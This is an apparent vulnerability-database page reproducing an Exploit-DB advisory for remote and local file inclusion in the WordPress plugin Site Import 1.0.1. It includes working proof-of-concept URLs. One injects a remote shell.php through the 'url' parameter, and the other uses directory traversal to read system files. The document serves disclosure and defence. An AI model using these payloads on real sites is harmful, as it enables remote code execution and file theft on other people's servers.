Wordpress Site Import 1.0.1 | Local and Remote file inclusion

vendor:

Site Import

by:

Wadeek

7,5

CVSS

HIGH

Local and Remote File Inclusion

CWE

Product Name: Site Import

Affected Version From: 1.0.1

Affected Version To: 1.0.1

Patch Exists: NO

Related CWE: N/A

CPE: a:wordpress:site_import:1.0.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Xampp on Windows7

2020

WordPress Site Import 1.0.1 | Local and Remote file inclusion

WordPress Site Import 1.0.1 is vulnerable to both local and remote file inclusion. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable parameter 'url' in the page.php file. This can be used to execute arbitrary code on the server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before being used in the application.

Source

Exploit-DB raw data:

# Exploit Title: Wordpress Site Import 1.0.1 | Local and Remote file inclusion
# Exploit Author: Wadeek
# Website Author: https://github.com/Wad-Deek
# Software Link: https://downloads.wordpress.org/plugin/site-import.1.0.1.zip
# Version: 1.0.1
# Tested on: Xampp on Windows7
 
[Version Disclosure]
======================================
/wp-content/plugins/site-import/readme.txt
======================================
[PoC]
======================================
Remote File Inclusion == http://localhost/wordpress/wp-content/plugins/site-import/admin/page.php?url=http%3a%2f%2flocalhost%2fshell.php?shell=ls
Local File Inclusion == http://localhost/wordpress/wp-content/plugins/site-import/admin/page.php?url=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
======================================